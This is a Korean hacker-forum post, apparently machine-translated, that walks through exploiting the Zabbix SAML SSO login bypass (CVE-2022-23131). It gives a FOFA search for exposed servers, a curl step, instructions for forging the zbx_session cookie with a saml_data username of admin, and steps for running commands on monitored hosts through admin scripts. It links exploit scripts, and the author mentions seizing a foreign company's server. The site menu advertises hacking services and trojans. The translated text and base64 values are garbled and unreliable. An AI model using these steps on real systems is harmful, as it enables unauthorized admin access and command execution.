[ HOME ]  [ 개인정보 보호정책 ]  [ 0day ]  [ 업무 합작 ]  [ 해킹 서비스 ]  [ 프로젝트 개발 ]  [ faq ]  [ 연락하기 ]  [ 원격 제어 트로이 목마 ]  [ 지불 ]    사용자: 25793     
Telegram

제목 : Zabbix 로그인 우회전 취약성 재발 (CVE-2022-23131)

K

KoreanHackerTeam

Moderator

0x00 前言​

최근에, Zabbix 취약성 (CVE-2022-23131)은이를 재현하고 실수로 외국 회사의 Zabbix 서버를 얻었습니다. Zabbix Sia Zabbix는 라트비아의 Zabbix Sia (Zabbix SIA)의 오픈 소스 모니터링 시스템입니다. 이 시스템은 네트워크 모니터링, 서버 모니터링, 클라우드 모니터링 및 응용 프로그램 모니터링을 지원합니다. Zabbix Frontend에는 악의적 인 액터가 세션에 저장된 사용자 로그인이 확인되지 않았기 때문에 악의적 인 액터가 SAML SSO 인증 (비 디폴트)으로 세션 데이터를 수정할 수 있다는 보안 취약점이 있습니다. 무단 악성 공격자는이 문제를 악용하여 권한을 확대하고 Zabbix 프론트 엔드에 대한 관리자 액세스를 얻을 수 있습니다.

0x01 漏洞原因​

SAML SSO 인증 활성화 (Default)가 포함 된 악성 공격자는 세션 데이터를 수정하여 인증 우회를 구현할 수 있습니다. 무단 악성 공격자는이 문제를 악용하여 권한을 확대하고 Zabbix 프론트 엔드에 대한 관리자 액세스를 얻을 수 있습니다.
이 취약점은 index_sso.php 파일에 존재합니다. index_sso.php 파일은 cencryptedcookiesession:checksign () 메소드를 호출하여 쿠키를 확인하고 클라이언트의 쿠키를 위조 할 수 있습니다.
INDEX_SSO.PHP 파일에서 SAML_DATA가 단조 쿠키에 존재할 때 username_attribute 데이터를 얻는다는 것을 알 수 있습니다. 사용자가 실제로 존재하는 경우, ID 인증 우회를 달성하기 위해 SessionID가 생성됩니다.

0x02 漏洞影响​

5.4.8
5.0.18
4.0.36

0x03 漏洞复现​

FOFA : app='Zabbix-supervision System'body='saml'Execution curl -kssil http://xxx.com/
image-20220228135432625

Set-Cookie의 값을 얻은 다음 URL 디코딩을 수행 한 다음 Base64 디코딩을 수행하십시오.
URL 디코딩 :
eyjzzxnzaw9uawqioiixnzfiodawoti4ndq2mmuxzgrhodayywfjodk5mdi2yyisinnpz24ioij0etzszvkzvdrxvedyenjsef M2ZLPYNTRHT3PCMHBHS25VWHBHZDR3MHDKC2LWNTJ2AUDNDYTDULPQJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJYQUJ5WDK5BGHNMVVHBFM4CTRWNJBKB1WVUGC9PSJ9
Base64 디코딩 :
{ 'sessionId':'171B8009284462E1DDA802AAC899026C', 'SIGN':'TY6REY3T4QTGX zrlxs6fzr54aozb0paknoxpad4wjsip52viggw+crzjyrrabyx99lhm1ugls8q4p60jo \/pg=='}
image-20220228135629785

그런 다음 문자열을 연결하십시오
{ 'saml_data': {'username_attribute':'admin '},'sessionid':'171b8009284462e1dda802aac899026c ', '서명 ':'ty6rey3t4qtgxzrlxs6fzr54aozb0paknoxpad4w0wjsip52viggw+crzjyrrabyx99lhm1ugls8q4p60jo \/pg=='}
스 플라이 싱 후, Base64 암호화가 수행된다
image-20220228142358256

그런 다음 urlencode에서
image-20220228142419540

image-20220228142545863

执行命令​

image-20220228142656315

관리- 새 스크립트를 만들기위한 스크립트를 찾으십시오. 여기에서 ifconfig를 만들었습니다.
image-20220228143058058

image-20220228142800341

모니터링에서 최신 데이터를 찾은 다음 실행하려는 호스트 그룹을 필터링하고 호스트 이름을 클릭하여 해당 명령을 실행하십시오.
image-20220228142957655

또는 github 익스플로잇 스크립트 : https://github.com/l0ading-x/cve-2022-231https://github.com/mr-xn/cve-2022-23131 스크립트를 실행하고 관리자는 기본 고급 사용자이며 세션 값을 얻습니다.
1049983-20220303100933103-1583005440.jpg
교체 쿠키의 ZBX_SESSION 값은 페이로드입니다. 그런 다음 SAML (Single Sign-On)
1049983-20220303100933863-1203796296.jpg
로 로그인을 클릭하거나 쿠키 값을 대체하여 쿠키 가치를 대체하여
1049983-20220303100934330-322898632.jpg
로그인을 성공적으로 바꿀 수있었습니다.
1049983-20220303100934820-1396911793.jpg

0x04 修复方法​

1. SAML 인증 비활성화
2. 보안 버전 업그레이드 (https://support.zabbix.com/browse/zbx-20350)
 
여기에 답변하려면 로그인 또는 등록해야합니다.

Partner Website: HACKHUB TW hacker Team Black hat dark Web hacking team HACKING FOURM HACKER.BZ UKhacker
대한민국 최대 해커 포럼:본 사이트의 튜토리얼, 글, 도구 및 기타 관련 내용은 학습과 연구용으로만 제공되며, 그 목적은 대중의 인터넷 보안의식과 보안능력을 제고하는 것입니다.
우리는 어떤 형식의 불법 활동이든 강력히 반대하며, 타인의 네트워크 시스템에 침입하거나 공격하거나 파괴하는 허가 없는 행위를 금지한다.
Copyright © 2013-2025 KRHACK 당신은 우리의 텔레그램에 연락해서 업무 협력을 할 수 있다: @APTs37  웹 싸이트 지도Sitemap
뒤로
상단